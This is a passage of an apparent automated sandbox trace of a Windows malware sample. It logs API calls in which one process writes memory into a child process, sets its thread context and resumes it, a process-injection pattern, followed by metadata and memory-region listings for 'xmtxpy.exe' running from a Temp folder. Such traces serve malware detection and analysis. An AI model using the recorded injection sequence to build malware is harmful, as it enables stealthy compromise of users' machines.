Buffer=0x9d0400*, NumberOfBytesToWrite=0x13800, NumberOfBytesWritten=0x19ede8 | out: Buffer=0x9d0400*, NumberOfBytesWritten=0x19ede8*=0x13800) returned 0x0 [0204.768] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19edb4 | out: Wow64Process=0x19edb4*=1) returned 1 [0204.768] lstrlenW (lpString="xmtxpy.exe") returned 10 [0204.768] lstrlenW (lpString="ntdll.dll") returned 9 [0204.768] lstrlenW (lpString="ntdll.dll") returned 9 [0204.768] lstrlenW (lpString="ntdll.dll") returned 9 [0204.768] lstrlenW (lpString="ntdll.dll") returned 9 [0204.768] lstrlenW (lpString="tdll.dll") returned 8 [0204.768] lstrlenW (lpString="dll.dll") returned 7 [0204.769] lstrlenW (lpString="ll.dll") returned 6 [0204.769] lstrlenW (lpString="l.dll") returned 5 [0204.769] lstrlenW (lpString=".dll") returned 4 [0204.769] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0204.769] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0204.769] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0204.770] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ed88, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19ed88*=0x1784a0, lpOverlapped=0x0) returned 1 [0204.797] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0205.023] CloseHandle (hObject=0x1e8) returned 1 [0205.024] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.053] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.120] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x415000, Buffer=0x9e3c00*, NumberOfBytesToWrite=0x4200, NumberOfBytesWritten=0x19ede8 | out: Buffer=0x9e3c00*, NumberOfBytesWritten=0x19ede8*=0x4200) returned 0x0 [0206.514] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19edb4 | out: Wow64Process=0x19edb4*=1) returned 1 [0206.514] lstrlenW (lpString="xmtxpy.exe") returned 10 [0206.514] lstrlenW (lpString="ntdll.dll") returned 9 [0206.514] lstrlenW (lpString="ntdll.dll") returned 9 [0206.514] lstrlenW (lpString="ntdll.dll") returned 9 [0206.514] lstrlenW (lpString="ntdll.dll") returned 9 [0206.514] lstrlenW (lpString="tdll.dll") returned 8 [0206.514] lstrlenW (lpString="dll.dll") returned 7 [0206.514] lstrlenW (lpString="ll.dll") returned 6 [0206.514] lstrlenW (lpString="l.dll") returned 5 [0206.514] lstrlenW (lpString=".dll") returned 4 [0206.514] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0206.515] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0206.515] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0206.515] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ed88, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19ed88*=0x1784a0, lpOverlapped=0x0) returned 1 [0206.551] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0206.831] CloseHandle (hObject=0x1e8) returned 1 [0206.832] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.011] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.145] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x41a000, Buffer=0x9e7e00*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19ede8 | out: Buffer=0x9e7e00*, NumberOfBytesWritten=0x19ede8*=0x200) returned 0x0 [0209.920] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19edb4 | out: Wow64Process=0x19edb4*=1) returned 1 [0209.920] lstrlenW (lpString="xmtxpy.exe") returned 10 [0209.921] lstrlenW (lpString="ntdll.dll") returned 9 [0209.921] lstrlenW (lpString="ntdll.dll") returned 9 [0209.921] lstrlenW (lpString="ntdll.dll") returned 9 [0209.921] lstrlenW (lpString="ntdll.dll") returned 9 [0209.921] lstrlenW (lpString="tdll.dll") returned 8 [0209.921] lstrlenW (lpString="dll.dll") returned 7 [0209.921] lstrlenW (lpString="ll.dll") returned 6 [0209.921] lstrlenW (lpString="l.dll") returned 5 [0209.921] lstrlenW (lpString=".dll") returned 4 [0209.922] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0209.923] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0209.923] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0209.924] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ed88, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19ed88*=0x1784a0, lpOverlapped=0x0) returned 1 [0211.139] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0215.192] CloseHandle (hObject=0x1e8) returned 1 [0215.193] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0216.441] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0216.603] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x4a0000, Buffer=0x9e8000*, NumberOfBytesToWrite=0x2000, NumberOfBytesWritten=0x19ede8 | out: Buffer=0x9e8000*, NumberOfBytesWritten=0x19ede8*=0x2000) returned 0x0 [0222.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19edb4 | out: Wow64Process=0x19edb4*=1) returned 1 [0222.501] lstrlenW (lpString="xmtxpy.exe") returned 10 [0222.501] lstrlenW (lpString="ntdll.dll") returned 9 [0222.501] lstrlenW (lpString="ntdll.dll") returned 9 [0222.501] lstrlenW (lpString="ntdll.dll") returned 9 [0222.501] lstrlenW (lpString="ntdll.dll") returned 9 [0222.501] lstrlenW (lpString="tdll.dll") returned 8 [0222.501] lstrlenW (lpString="dll.dll") returned 7 [0222.501] lstrlenW (lpString="ll.dll") returned 6 [0222.501] lstrlenW (lpString="l.dll") returned 5 [0222.501] lstrlenW (lpString=".dll") returned 4 [0222.502] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0222.502] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0222.502] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0222.502] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ed88, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19ed88*=0x1784a0, lpOverlapped=0x0) returned 1 [0222.563] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0222.854] CloseHandle (hObject=0x1e8) returned 1 [0222.855] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0226.768] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0226.896] NtWriteVirtualMemory (in: ProcessHandle=0x1e0, BaseAddress=0x273008, Buffer=0x19f584*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19ede8 | out: Buffer=0x19f584*, NumberOfBytesWritten=0x19ede8*=0x4) returned 0x0 [0228.708] SetThreadContext (hThread=0x1dc, lpContext=0x19f22c*(ContextFlags=0x10007, Dr0=0x6328517d, Dr1=0xfffffffe, Dr2=0xd60002d4, Dr3=0x77bc2e9b, Dr6=0x42, Dr7=0x50, FloatSave.ControlWord=0x4d02bc, FloatSave.StatusWord=0x19f270, FloatSave.TagWord=0x19f360, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x42, FloatSave.DataOffset=0x50, FloatSave.DataSelector=0x4d0000, FloatSave.RegisterArea=([0]=0xf0, [1]=0xa8, [2]=0x4e, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0xa, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xff, [13]=0x7, [14]=0x0, [15]=0x0, [16]=0xf0, [17]=0x0, [18]=0x9d, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x1, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x25, [33]=0x2, [34]=0x0, [35]=0xc0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb8, [45]=0xf2, [46]=0x19, [47]=0x0, [48]=0xd4, [49]=0x2, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x14, [57]=0x2, [58]=0x4e, [59]=0x0, [60]=0x54, [61]=0x2, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x9d, [67]=0x0, [68]=0x0, [69]=0xf5, [70]=0x19, [71]=0x0, [72]=0xf8, [73]=0xa8, [74]=0x4e, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x4d2540, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x273000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x77c08fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xe0, [1]=0xf4, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x20, [17]=0xf3, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0xbc, [23]=0x77, [24]=0xa8, [25]=0xf3, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x70, [41]=0xf3, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0xbc, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0xbc, [55]=0x77, [56]=0xf5, [57]=0xbd, [58]=0xf9, [59]=0x14, [60]=0xe8, [61]=0xf4, [62]=0x19, [63]=0x0, [64]=0x78, [65]=0xf5, [66]=0x19, [67]=0x0, [68]=0xe0, [69]=0xf4, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x84, [77]=0xf4, [78]=0x19, [79]=0x0, [80]=0xa8, [81]=0xf3, [82]=0x19, [83]=0x0, [84]=0xe8, [85]=0xf4, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x30, [97]=0xf3, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0xc0, [111]=0x77, [112]=0xad, [113]=0x6f, [114]=0x28, [115]=0x63, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0xbc, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0xbd, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xe0, [145]=0xf4, [146]=0x19, [147]=0x0, [148]=0xa4, [149]=0xf3, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x78, [157]=0xf5, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0xbd, [163]=0x77, [164]=0x5c, [165]=0xf4, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xb0, [181]=0xf3, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xc0, [205]=0x0, [206]=0xa8, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xb4, [273]=0xf4, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xf0, [285]=0xfe, [286]=0x19, [287]=0x0, [288]=0x88, [289]=0xf5, [290]=0x19, [291]=0x0, [292]=0xb0, [293]=0xf4, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0xc8, [301]=0xf4, [302]=0x19, [303]=0x0, [304]=0xd9, [305]=0x98, [306]=0xb7, [307]=0x76, [308]=0x88, [309]=0x65, [310]=0xbc, [311]=0x77, [312]=0x36, [313]=0x1a, [314]=0xfd, [315]=0x7f, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x50, [325]=0xf4, [326]=0x19, [327]=0x0, [328]=0x50, [329]=0xf4, [330]=0x19, [331]=0x0, [332]=0x50, [333]=0xf4, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0xfd, [347]=0x7f, [348]=0xd9, [349]=0xba, [350]=0xf9, [351]=0x14, [352]=0xd4, [353]=0xf5, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0xbc, [363]=0x77, [364]=0xfc, [365]=0xf4, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x70, [377]=0xfa, [378]=0x19, [379]=0x0, [380]=0xf0, [381]=0xfe, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0xbc, [387]=0x77, [388]=0xb5, [389]=0x74, [390]=0xb8, [391]=0x76, [392]=0xe8, [393]=0xf6, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xf0, [401]=0xfe, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x38, [429]=0xfa, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0xbc, [435]=0x77, [436]=0xe8, [437]=0xf4, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x19, [445]=0xbd, [446]=0xf9, [447]=0x14, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x40, [453]=0xf5, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0xbd, [471]=0x77, [472]=0xd7, [473]=0xe9, [474]=0xd, [475]=0x1, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0xbd, [483]=0x77, [484]=0xf8, [485]=0xf6, [486]=0x19, [487]=0x0, [488]=0x40, [489]=0x25, [490]=0x4d, [491]=0x0, [492]=0x6c, [493]=0xf5, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x38, [509]=0xfa, [510]=0x19, [511]=0x0))) returned 1 [0229.107] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eddc | out: Wow64Process=0x19eddc*=1) returned 1 [0229.107] lstrlenW (lpString="xmtxpy.exe") returned 10 [0229.107] lstrlenW (lpString="ntdll.dll") returned 9 [0229.107] lstrlenW (lpString="ntdll.dll") returned 9 [0229.107] lstrlenW (lpString="ntdll.dll") returned 9 [0229.107] lstrlenW (lpString="ntdll.dll") returned 9 [0229.108] lstrlenW (lpString="tdll.dll") returned 8 [0229.108] lstrlenW (lpString="dll.dll") returned 7 [0229.108] lstrlenW (lpString="ll.dll") returned 6 [0229.108] lstrlenW (lpString="l.dll") returned 5 [0229.108] lstrlenW (lpString=".dll") returned 4 [0229.108] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0229.108] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0229.109] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xf30000 [0229.109] ReadFile (in: hFile=0x1e8, lpBuffer=0xf30000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19edb0, lpOverlapped=0x0 | out: lpBuffer=0xf30000*, lpNumberOfBytesRead=0x19edb0*=0x1784a0, lpOverlapped=0x0) returned 1 [0229.297] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2500000 [0229.469] CloseHandle (hObject=0x1e8) returned 1 [0229.470] VirtualFree (lpAddress=0xf30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.589] VirtualFree (lpAddress=0x2500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.615] NtResumeThread (in: ThreadHandle=0x1dc, SuspendCount=0x19edf8 | out: SuspendCount=0x19edf8*=0x1) returned 0x0 [0229.782] ExitProcess (uExitCode=0x0) [0229.784] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4ec140 | out: hHeap=0x4d0000) returned 1 Thread: id = 54 os_tid = 0x121c Thread: id = 55 os_tid = 0x1220 Thread: id = 56 os_tid = 0x1224 Process: id = "7" image_name = "xmtxpy.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe" page_root = "0x57553000" os_pid = "0x1248" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x120c" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1408 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1409 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1410 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1411 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1412 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1413 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1414 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1415 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1416 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1417 start_va = 0x10d0000 end_va = 0x10f3fff monitored = 1 entry_point = 0x10de9d7 region_type = mapped_file name = "xmtxpy.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe") Region: id = 1418 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1419 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1420 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1421 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1422 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1423 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1424 start_va = 0x400000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1633 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1634 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1635 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1636 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1637 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1638 start_va = 0x5c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1639 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1640 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1641 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1642 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1643 start_va = 0x4b0000 end_va = 0x56dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1644 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1645 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1646 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1647 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: 